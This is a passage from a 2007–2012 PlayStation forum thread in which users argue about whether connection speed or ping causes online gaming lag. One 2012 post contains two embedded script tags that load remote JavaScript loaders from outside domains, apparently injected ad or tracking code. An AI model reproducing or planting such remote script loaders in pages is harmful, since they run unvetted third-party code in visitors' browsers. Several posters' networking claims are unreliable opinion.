Uncharted Territory
2208 posts

Re: Is 1.5 mbps Fast for the ps3?/?

Jul 16, 2007

Farough wrote:
I just did a speed test from Nashville to Los Angeles and it's 1,800 miles and I got a 107 PING! And I'm Using a 1.5 Mbps Connection!

Message Edited by Farough on 07-14-2007 08:02 PM

That's a good ping. You are fine.
Message 41 of 68 (141 Views)
0 Likes
Sackboy
575 posts

Jul 16, 2007
what depends on PING
Message 42 of 68 (141 Views)
0 Likes
Uncharted Territory
2115 posts

Jul 16, 2007
1 mbps heck no
Photo Sharing and Video Hosting at Photobucket
Message 43 of 68 (141 Views)
0 Likes
Uncharted Territory
2208 posts

Jul 16, 2007
YOU GUYS KNOW NOTHING!!!! Download and Upload is not what causes lag. It is your latency. Also known as you "PING". You can have a 1.5mbps and be perfectly all right. While some other guy may have a 1.5mbps connection and have horrible lag. It's the latency that effects your lag. NOT YOUR UPLOAD OR DOWNLOAD SPEED! If you ever play pc games. Most of them show your PING!!!! They don't show your upload or download speed!! A great example is Battlefield 2142 or almost any pc shooter. you can go to the list of players and it will show everybody's ping. This way people can see what kind of connection they are getting.

1 General rule for the most part.

-Fiber optics has the best pings with about 10-20 mili-second pings to a close server.
-Cable generally has the second best pings with 20-40 mili-second pings to a close server.
-DSL generally has pings of 40 mili-seconds and up to a close server depending on whether or not their connection has interleave (but that is another and very complicated topic. In short, interleave adds 32ms to a person's ping. Most DSL providers use interleave).
-Satellite has horrible pings sometimes getting in the 200s in mili-seconds to a close server.

ONCE AGIAN- Download and Upload measurments affect web-browsing, downloading, e-mail sending and other things. Latency is what affects games and lag.
Message 44 of 68 (141 Views)
0 Likes
Lombax Warrior
168 posts

Jul 16, 2007
not sure, mine is 10.0 mbps, thats fast enough for me. 
Photo Sharing and Video Hosting at PhotobucketPhoto Sharing and Video Hosting at PhotobucketPhoto Sharing and Video Hosting at PhotobucketPhoto Sharing and Video Hosting at PhotobucketPhoto Sharing and Video Hosting at Photobucket
Message 45 of 68 (141 Views)
0 Likes
Sackboy
575 posts

Jul 16, 2007
BUT IS IT POSSIBLE TO LOWER UR PING???WHAT CAUSES IT 2 BE HIGH
Message 46 of 68 (141 Views)
0 Likes
Uncharted Territory
2208 posts

Jul 16, 2007

GmackinG wrote:
BUT IS IT POSSIBLE TO LOWER UR PING???WHAT CAUSES IT 2 BE HIGH

There is nothing YOU can do to lower your ping. Some causes of high pings can be:

1. A faulty modem
2. Bad ethernet cables
3. Bad DSL/Cable line
4. Poor routing by your isp

If you are getting an unusually high ping. Give your isp a call and see if they can send someone out to see if something is wrong with your line.
Message 47 of 68 (141 Views)
0 Likes
First Son
29 posts

Jul 17, 2007
Okay guys, you don't need these godly speeds to play online, I should know, I have a cheap connection that works fine for online.

Download Speed: 1322 kbps (165.3 KB/sec transfer rate)
Upload Speed: 823 kbps (102.9 KB/sec transfer rate)

I do not experience any connection problems other than the server quiting on an online game, but I do sometimes get accused of lagging but this is when I run my torrent programs which I stop doing now everytime I play online.
Message 48 of 68 (141 Views)
0 Likes
First Son
3 posts

Oct 8, 2012

hey guys i have a quick question im preparing for cod bo2 girl just got this clear hotspot internet crap i wanted to know would i be able to play online with that or is that thing gonna be lagging up

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Message 49 of 68 (137 Views)
0 Likes
Sackboy
362 posts

[ Edited ]
Oct 9, 2012

afurry wrote:
YOU GUYS KNOW NOTHING!!!! Download and Upload is not what causes lag. It is your latency. Also known as you "PING". You can have a 1.5mbps and be perfectly all right. While some other guy may have a 1.5mbps connection and have horrible lag. It's the latency that effects your lag. NOT YOUR UPLOAD OR DOWNLOAD SPEED! If you ever play pc games. Most of them show your PING!!!! They don't show your upload or download speed!! A great example is Battlefield 2142 or almost any pc shooter. you can go to the list of players and it will show everybody's ping. This way people can see what kind of connection they are getting.

1 General rule for the most part.

-Fiber optics has the best pings with about 10-20 mili-second pings to a close server.
-Cable generally has the second best pings with 20-40 mili-second pings to a close server.
-DSL generally has pings of 40 mili-seconds and up to a close server depending on whether or not their connection has interleave (but that is another and very complicated topic. In short, interleave adds 32ms to a person's ping. Most DSL providers use interleave).
-Satellite has horrible pings sometimes getting in the 200s in mili-seconds to a close server.

ONCE AGIAN- Download and Upload measurments affect web-browsing, downloading, e-mail sending and other things. Latency is what affects games and lag.

I like how you keep telling everyone how 'they know nothing' when you don't even truly know what you are talking about either! Yes your Ping rate has an effect on lagging and such but its not the end all be all like you make it sound. It is, no matter how you slice it a combination of your download speed and your Ping rate, they go hand in hand. If you have no or low download speed then you have no or extremely high Ping rates. Upload speed plays pretty much no roll in online gaming, its to little to matter. And before you even try to argue this matter with me I use to work in the industry, I'm not some little kid and have hands on experience having to deal with these issues. And just so you know the ONLY reason that the online games you refer to track Ping rates is simply because its easier for them to do so as apposed to trying to track all your internet speed data.

Also I know you said its a General rule but again you are pretty much totally wrong. For starters for 90% - 95% of all areas there is no such thing as a full Fiber Optic system so there speeds are typical no better then Cable, in other words if you pay more of Fiber you are simply getting ripped off. And secondly I have Cable and my Ping rate is ALWAYS at no slower then 5ms and if I were to get as you say 20ms - 40ms that would be a test that is hundreds to thousands of miles away. Hell I even had a modem go bad on me and I was still getting 15ms Ping rates.

So Again STOP trying to act like you know so much and being a **bleep** telling others how much they don't know..

Uploaded with ImageShack.us
Message 50 of 68 (132 Views)
0 Likes